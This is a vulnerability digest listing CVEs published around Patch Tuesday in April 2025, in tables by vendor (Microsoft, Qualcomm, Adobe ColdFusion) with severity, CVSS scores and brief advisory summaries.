Patch Tuesday — April 2025
2025-04-08 · 945 CVEs
CVEs published or modified the week of 2025-04-08, partitioned by vendor.
Microsoft (149 CVEs)
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0539 | High | 8.8 | — | 2025-04-10 | In affected Microsoft Windows versions of Octopus Deploy, the server can be coerced into sending server-side requests that contain authentication material allowing a suitably positioned attacker to compromise the account running Octopus Se… |
CVE-2025-29794 | High | 8.8 | — | 2025-04-08 | Improper authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. |
CVE-2025-27740 | High | 8.8 | — | 2025-04-08 | Weak authentication in Windows Active Directory Certificate Services allows an authorized attacker to elevate privileges over a network. |
CVE-2025-27481 | High | 8.8 | — | 2025-04-08 | Stack-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-27477 | High | 8.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-26669 | High | 8.8 | — | 2025-04-08 | Out-of-bounds read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26647 | High | 8.8 | — | 2025-04-08 | Improper input validation in Windows Kerberos allows an authorized attacker to elevate privileges over a network. |
CVE-2025-21222 | High | 8.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-21221 | High | 8.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-21205 | High | 8.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-1095 | High | 8.8 | — | 2025-04-08 | IBM Personal Communications v14 and v15 include a Windows service that is vulnerable to local privilege escalation (LPE). |
CVE-2025-27737 | High | 8.6 | — | 2025-04-08 | Improper input validation in Windows Security Zone Mapping allows an unauthorized attacker to bypass a security feature locally. |
CVE-2025-26678 | High | 8.4 | — | 2025-04-08 | Improper access control in Windows Defender Application Control (WDAC) allows an unauthorized attacker to bypass a security feature locally. |
CVE-2025-27482 | High | 8.1 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Remote Desktop Gateway Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-27480 | High | 8.1 | — | 2025-04-08 | Use after free in Remote Desktop Gateway Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-26671 | High | 8.1 | — | 2025-04-08 | Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network. |
CVE-2025-26670 | High | 8.1 | — | 2025-04-08 | Use after free in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to execute code over a network. |
CVE-2025-26663 | High | 8.1 | — | 2025-04-08 | Use after free in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to execute code over a network. |
CVE-2025-27487 | High | 8.0 | — | 2025-04-08 | Heap-based buffer overflow in Remote Desktop Client allows an authorized attacker to execute code over a network. |
CVE-2025-30304 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30299 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30298 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30297 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30296 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30295 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-29824 | High | 7.8 | KEV | 2025-04-08 | Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally. |
CVE-2025-29823 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. |
CVE-2025-29822 | High | 7.8 | — | 2025-04-08 | Incomplete list of disallowed inputs in Microsoft Office OneNote allows an unauthorized attacker to bypass a security feature locally. |
CVE-2025-29820 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. |
CVE-2025-29812 | High | 7.8 | — | 2025-04-08 | Untrusted pointer dereference in Windows Kernel Memory allows an authorized attacker to elevate privileges locally. |
CVE-2025-29811 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows Mobile Broadband allows an authorized attacker to elevate privileges locally. |
CVE-2025-29801 | High | 7.8 | — | 2025-04-08 | Incorrect default permissions in Microsoft AutoUpdate (MAU) allows an authorized attacker to elevate privileges locally. |
CVE-2025-29800 | High | 7.8 | — | 2025-04-08 | Improper privilege management in Microsoft AutoUpdate (MAU) allows an authorized attacker to elevate privileges locally. |
CVE-2025-29791 | High | 7.8 | — | 2025-04-08 | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27752 | High | 7.8 | — | 2025-04-08 | Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally. |
CVE-2025-27751 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. |
CVE-2025-27750 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. |
CVE-2025-27749 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27748 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27747 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. |
CVE-2025-27746 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27745 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27744 | High | 7.8 | — | 2025-04-08 | Improper access control in Microsoft Office allows an authorized attacker to elevate privileges locally. |
CVE-2025-27743 | High | 7.8 | — | 2025-04-08 | Untrusted search path in System Center allows an authorized attacker to elevate privileges locally. |
CVE-2025-27741 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally. |
CVE-2025-27739 | High | 7.8 | — | 2025-04-08 | Untrusted pointer dereference in Windows Kernel allows an authorized attacker to elevate privileges locally. |
CVE-2025-27733 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally. |
CVE-2025-27731 | High | 7.8 | — | 2025-04-08 | Improper input validation in OpenSSH for Windows allows an authorized attacker to elevate privileges locally. |
CVE-2025-27730 | High | 7.8 | — | 2025-04-08 | Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally. |
CVE-2025-27729 | High | 7.8 | — | 2025-04-08 | Use after free in Windows Shell allows an unauthorized attacker to execute code locally. |
CVE-2025-27728 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally. |
CVE-2025-27727 | High | 7.8 | — | 2025-04-08 | Improper link resolution before file access ('link following') in Windows Installer allows an authorized attacker to elevate privileges locally. |
CVE-2025-27490 | High | 7.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally. |
CVE-2025-27489 | High | 7.8 | — | 2025-04-08 | Improper input validation in Azure Local allows an authorized attacker to elevate privileges locally. |
CVE-2025-27483 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally. |
CVE-2025-27476 | High | 7.8 | — | 2025-04-08 | Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally. |
CVE-2025-27467 | High | 7.8 | — | 2025-04-08 | Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally. |
CVE-2025-27200 | High | 7.8 | — | 2025-04-08 | Animate versions 24.0.7, 23.0.10 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27199 | High | 7.8 | — | 2025-04-08 | Animate versions 24.0.7, 23.0.10 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27198 | High | 7.8 | — | 2025-04-08 | Photoshop Desktop versions 25.12.1, 26.4.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27196 | High | 7.8 | — | 2025-04-08 | Premiere Pro versions 25.1, 24.6.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27195 | High | 7.8 | — | 2025-04-08 | Media Encoder versions 25.1, 24.6.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27194 | High | 7.8 | — | 2025-04-08 | Media Encoder versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27193 | High | 7.8 | — | 2025-04-08 | Bridge versions 14.1.5, 15.0.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27183 | High | 7.8 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27182 | High | 7.8 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-26688 | High | 7.8 | — | 2025-04-08 | Stack-based buffer overflow in Microsoft Virtual Hard Drive allows an authorized attacker to elevate privileges locally. |
CVE-2025-26679 | High | 7.8 | — | 2025-04-08 | Use after free in RPC Endpoint Mapper Service allows an authorized attacker to elevate privileges locally. |
CVE-2025-26675 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows Subsystem for Linux allows an authorized attacker to elevate privileges locally. |
CVE-2025-26674 | High | 7.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Media allows an authorized attacker to execute code locally. |
CVE-2025-26666 | High | 7.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Media allows an authorized attacker to execute code locally. |
CVE-2025-26648 | High | 7.8 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows Kernel allows an authorized attacker to elevate privileges locally. |
CVE-2025-26642 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-26639 | High | 7.8 | — | 2025-04-08 | Integer overflow or wraparound in Windows USB Print Driver allows an authorized attacker to elevate privileges locally. |
CVE-2025-24074 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-24073 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-24062 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-24060 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-24058 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-21204 | High | 7.8 | — | 2025-04-08 | Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally. |
CVE-2025-29816 | High | 7.5 | — | 2025-04-08 | Improper input validation in Microsoft Office Word allows an unauthorized attacker to bypass a security feature over a network. |
CVE-2025-29810 | High | 7.5 | — | 2025-04-08 | Improper access control in Active Directory Domain Services allows an authorized attacker to elevate privileges over a network. |
CVE-2025-29805 | High | 7.5 | — | 2025-04-08 | Exposure of sensitive information to an unauthorized actor in Outlook for Android allows an unauthorized attacker to disclose information over a network. |
CVE-2025-27486 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-27485 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-27484 | High | 7.5 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges over a network. |
CVE-2025-27479 | High | 7.5 | — | 2025-04-08 | Insufficient resource pool in Windows Kerberos allows an unauthorized attacker to deny service over a network. |
CVE-2025-27473 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows HTTP.sys allows an unauthorized attacker to deny service over a network. |
CVE-2025-27470 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-27469 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network. |
CVE-2025-26687 | High | 7.5 | — | 2025-04-08 | Use after free in Windows Win32K - GRFX allows an unauthorized attacker to elevate privileges over a network. |
CVE-2025-26686 | High | 7.5 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows TCP/IP allows an unauthorized attacker to execute code over a network. |
CVE-2025-26682 | High | 7.5 | — | 2025-04-08 | Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network. |
CVE-2025-26680 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-26673 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network. |
CVE-2025-26668 | High | 7.5 | — | 2025-04-08 | Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network. |
CVE-2025-26652 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-26641 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Cryptographic Services allows an unauthorized attacker to deny service over a network. |
CVE-2025-21174 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-29804 | High | 7.3 | — | 2025-04-08 | Improper access control in Visual Studio allows an authorized attacker to elevate privileges locally. |
CVE-2025-29802 | High | 7.3 | — | 2025-04-08 | Improper access control in Visual Studio allows an authorized attacker to elevate privileges locally. |
CVE-2025-29792 | High | 7.3 | — | 2025-04-08 | Use after free in Microsoft Office allows an authorized attacker to elevate privileges locally. |
CVE-2025-26628 | High | 7.3 | — | 2025-04-08 | Insufficiently protected credentials in Azure Local Cluster allows an authorized attacker to disclose information locally. |
CVE-2025-29793 | High | 7.2 | — | 2025-04-08 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. |
CVE-2025-29809 | High | 7.1 | — | 2025-04-08 | Insecure storage of sensitive information in Windows Kerberos allows an authorized attacker to bypass a security feature locally. |
CVE-2025-27491 | High | 7.1 | — | 2025-04-08 | Use after free in Windows Hyper-V allows an authorized attacker to execute code over a network. |
CVE-2025-27732 | High | 7.0 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally. |
CVE-2025-27492 | High | 7.0 | — | 2025-04-08 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Secure Channel allows an authorized attacker to elevate privileges locally. |
CVE-2025-27478 | High | 7.0 | — | 2025-04-08 | Heap-based buffer overflow in Windows Local Security Authority (LSA) allows an authorized attacker to elevate privileges locally. |
CVE-2025-27475 | High | 7.0 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows Update Stack allows an authorized attacker to elevate privileges locally. |
CVE-2025-26665 | High | 7.0 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows upnphost.dll allows an authorized attacker to elevate privileges locally. |
CVE-2025-26649 | High | 7.0 | — | 2025-04-08 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Secure Channel allows an authorized attacker to elevate privileges locally. |
CVE-2025-26640 | High | 7.0 | — | 2025-04-08 | Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally. |
CVE-2025-21191 | High | 7.0 | — | 2025-04-08 | Time-of-check time-of-use (toctou) race condition in Windows Local Security Authority (LSA) allows an authorized attacker to elevate privileges locally. |
CVE-2025-26637 | Medium | 6.8 | — | 2025-04-08 | Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack. |
CVE-2025-25002 | Medium | 6.8 | — | 2025-04-08 | Insertion of sensitive information into log file in Azure Local Cluster allows an authorized attacker to disclose information over an adjacent network. |
CVE-2025-26681 | Medium | 6.7 | — | 2025-04-08 | Use after free in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally. |
CVE-2025-27738 | Medium | 6.5 | — | 2025-04-08 | Improper access control in Windows Resilient File System (ReFS) allows an authorized attacker to disclose information over a network. |
CVE-2025-27474 | Medium | 6.5 | — | 2025-04-08 | Use of uninitialized resource in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26676 | Medium | 6.5 | — | 2025-04-08 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26672 | Medium | 6.5 | — | 2025-04-08 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26667 | Medium | 6.5 | — | 2025-04-08 | Exposure of sensitive information to an unauthorized actor in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26664 | Medium | 6.5 | — | 2025-04-08 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26651 | Medium | 6.5 | — | 2025-04-08 | Exposed dangerous method or function in Windows Local Session Manager (LSM) allows an authorized attacker to deny service over a network. |
CVE-2025-26635 | Medium | 6.5 | — | 2025-04-08 | Weak authentication in Windows Hello allows an authorized attacker to bypass a security feature over a network. |
CVE-2025-21203 | Medium | 6.5 | — | 2025-04-08 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-21197 | Medium | 6.5 | — | 2025-04-08 | Improper access control in Windows NTFS allows an authorized attacker to disclose file path information under a folder where the attacker doesn't have permission to list content. |
CVE-2025-29819 | Medium | 6.2 | — | 2025-04-08 | External control of file name or path in Azure Portal Windows Admin Center allows an unauthorized attacker to disclose information locally. |
CVE-2025-27735 | Medium | 6.0 | — | 2025-04-08 | Insufficient verification of data authenticity in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to bypass a security feature locally. |
CVE-2025-27471 | Medium | 5.9 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Microsoft Streaming Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-30303 | Medium | 5.5 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30302 | Medium | 5.5 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30301 | Medium | 5.5 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. |
CVE-2025-30300 | Medium | 5.5 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. |
CVE-2025-29821 | Medium | 5.5 | — | 2025-04-08 | Improper input validation in Dynamics Business Central allows an authorized attacker to disclose information locally. |
CVE-2025-29808 | Medium | 5.5 | — | 2025-04-08 | Use of a cryptographic primitive with a risky implementation in Windows Cryptographic Services allows an authorized attacker to disclose information locally. |
CVE-2025-27742 | Medium | 5.5 | — | 2025-04-08 | Out-of-bounds read in Windows NTFS allows an unauthorized attacker to disclose information locally. |
CVE-2025-27736 | Medium | 5.5 | — | 2025-04-08 | Exposure of sensitive information to an unauthorized actor in Windows Power Dependency Coordinator allows an authorized attacker to disclose information locally. |
CVE-2025-27204 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27202 | Medium | 5.5 | — | 2025-04-08 | Animate versions 24.0.7, 23.0.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27201 | Medium | 5.5 | — | 2025-04-08 | Animate versions 24.0.7, 23.0.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27187 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27186 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27185 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. |
CVE-2025-27184 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2023-42007 | Medium | 5.4 | — | 2025-04-10 | IBM Sterling Control Center 6.2.1, 6.3.1, and 6.4.0 is vulnerable to cross-site scripting. |
CVE-2025-27472 | Medium | 5.4 | — | 2025-04-08 | Protection mechanism failure in Windows Mark of the Web (MOTW) allows an unauthorized attacker to bypass a security feature over a network. |
CVE-2025-26644 | Medium | 5.1 | — | 2025-04-08 | Automated recognition mechanism with inadequate detection or handling of adversarial input perturbations in Windows Hello allows an unauthorized attacker to perform spoofing locally. |
CVE-2023-43035 | Medium | 4.0 | — | 2025-04-10 | IBM Sterling Control Center 6.2.1, 6.3.1, and 6.4.0 allows web pages to be stored locally which can be read by another user on the system. |
Other vendors (796 CVEs across 371 vendors)
Qualcomm · 34 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-45552 | High | 8.2 | — | 2025-04-07 | Information disclosure may occur during a video call if a device resets due to a non-conforming RTCP packet that doesn't adhere to RFC standards. |
CVE-2025-21447 | High | 7.8 | — | 2025-04-07 | Memory corruption may occur while processing device IO control call for session control. |
CVE-2025-21443 | High | 7.8 | — | 2025-04-07 | Memory corruption while processing message content in eAVB. |
CVE-2025-21442 | High | 7.8 | — | 2025-04-07 | Memory corruption while transmitting packet mapping information with invalid header payload size. |
CVE-2025-21441 | High | 7.8 | — | 2025-04-07 | Memory corruption when IOCTL call is invoked from user-space to write board data to WLAN driver. |
CVE-2025-21440 | High | 7.8 | — | 2025-04-07 | Memory corruption when IOCTL call is invoked from user-space to write board data to WLAN driver. |
CVE-2025-21439 | High | 7.8 | — | 2025-04-07 | Memory corruption may occur while reading board data via IOCTL call when the WLAN driver copies the content to the provided output buffer. |
CVE-2025-21438 | High | 7.8 | — | 2025-04-07 | Memory corruption while IOCTL call is invoked from user-space to read board data. |
CVE-2025-21437 | High | 7.8 | — | 2025-04-07 | Memory corruption while processing memory map or unmap IOCTL operations simultaneously. |
CVE-2025-21436 | High | 7.8 | — | 2025-04-07 | Memory corruption may occur while initiating two IOCTL calls simultaneously to create processes from two different threads. |
CVE-2025-21423 | High | 7.8 | — | 2025-04-07 | Memory corruption occurs when handling client calls to EnableTestMode through an Escape call. |
CVE-2025-21421 | High | 7.8 | — | 2025-04-07 | Memory corruption while processing escape code in API. |
CVE-2024-45557 | High | 7.8 | — | 2025-04-07 | Memory corruption can occur when TME processes addresses from TZ and MPSS requests without proper validation. |
CVE-2024-43067 | High | 7.8 | — | 2025-04-07 | Memory corruption occurs during the copying of read data from the EEPROM because the IO configuration is exposed as shared memory. |
CVE-2024-43066 | High | 7.8 | — | 2025-04-07 | Memory corruption while handling file descriptor during listener registration/de-registration. |
CVE-2024-43058 | High | 7.8 | — | 2025-04-07 | Memory corruption while processing IOCTL calls. |
CVE-2024-45549 | High | 7.7 | — | 2025-04-07 | Information disclosure while creating MQ channels. |
CVE-2025-21448 | High | 7.5 | — | 2025-04-07 | Transient DOS may occur while parsing SSID in action frames. |
CVE-2025-21435 | High | 7.5 | — | 2025-04-07 | Transient DOS may occur while parsing extended IE in beacon. |
CVE-2025-21434 | High | 7.5 | — | 2025-04-07 | Transient DOS may occur while parsing EHT operation IE or EHT capability IE. |
CVE-2025-21430 | High | 7.5 | — | 2025-04-07 | Transient DOS while connecting STA to AP and initiating ADD TS request from AP to establish TSpec session. |
CVE-2025-21429 | High | 7.5 | — | 2025-04-07 | Memory corruption occurs while connecting a STA to an AP and initiating an ADD TS request. |
CVE-2025-21428 | High | 7.5 | — | 2025-04-07 | Memory corruption occurs while connecting a STA to an AP and initiating an ADD TS request from the AP to establish a TSpec session. |
CVE-2024-33058 | High | 7.5 | — | 2025-04-07 | Memory corruption while assigning memory from the source DDR memory (HLOS) to ADSP. |
CVE-2025-21425 | High | 7.3 | — | 2025-04-07 | Memory corruption may occur due to improper access control in HAB process. |
CVE-2024-43065 | High | 7.1 | — | 2025-04-07 | Cryptographic issues while generating an asymmetric key pair for RKP use cases. |
CVE-2024-49848 | Medium | 6.7 | — | 2025-04-07 | Memory corruption while processing multiple IOCTL calls from HLOS to DSP. |
CVE-2024-45544 | Medium | 6.6 | — | 2025-04-07 | Memory corruption while processing IOCTL calls to add route entry in the HW. |
CVE-2024-45543 | Medium | 6.6 | — | 2025-04-07 | Memory corruption while accessing MSM channel map and mixer functions. |
CVE-2024-45540 | Medium | 6.6 | — | 2025-04-07 | Memory corruption while invoking IOCTL map buffer request from userspace. |
CVE-2024-45556 | Medium | 6.5 | — | 2025-04-07 | Cryptographic issue may arise because the access control configuration permits Linux to read key registers in TCSR. |
CVE-2024-45551 | Medium | 6.2 | — | 2025-04-07 | Cryptographic issue occurs during PIN/password verification using Gatekeeper, where RPMB writes can be dropped on verification failure, potentially leading to a user throttling bypass. |
CVE-2025-21431 | Medium | 5.5 | — | 2025-04-07 | Information disclosure may occur when a guest VM is connected. |
CVE-2024-43046 | Medium | 5.5 | — | 2025-04-07 | There may be information disclosure during memory re-allocation in TZ Secure OS. |
Adobe · 26 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30282 | Critical | 9.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Authentication vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30281 | Critical | 9.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Access Control vulnerability that could result in arbitrary code execution. |
CVE-2025-24447 | Critical | 9.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user resulting in a High impact to Confi… |
CVE-2025-24446 | Critical | 9.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution. |
CVE-2025-30290 | High | 8.7 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to a security feature bypass. |
CVE-2025-30286 | High | 8.4 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead to arbitrary code execution by an attacker. |
CVE-2025-30285 | High | 8.4 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30284 | High | 8.4 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30289 | High | 8.2 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead to arbitrary code execution by an attacker. |
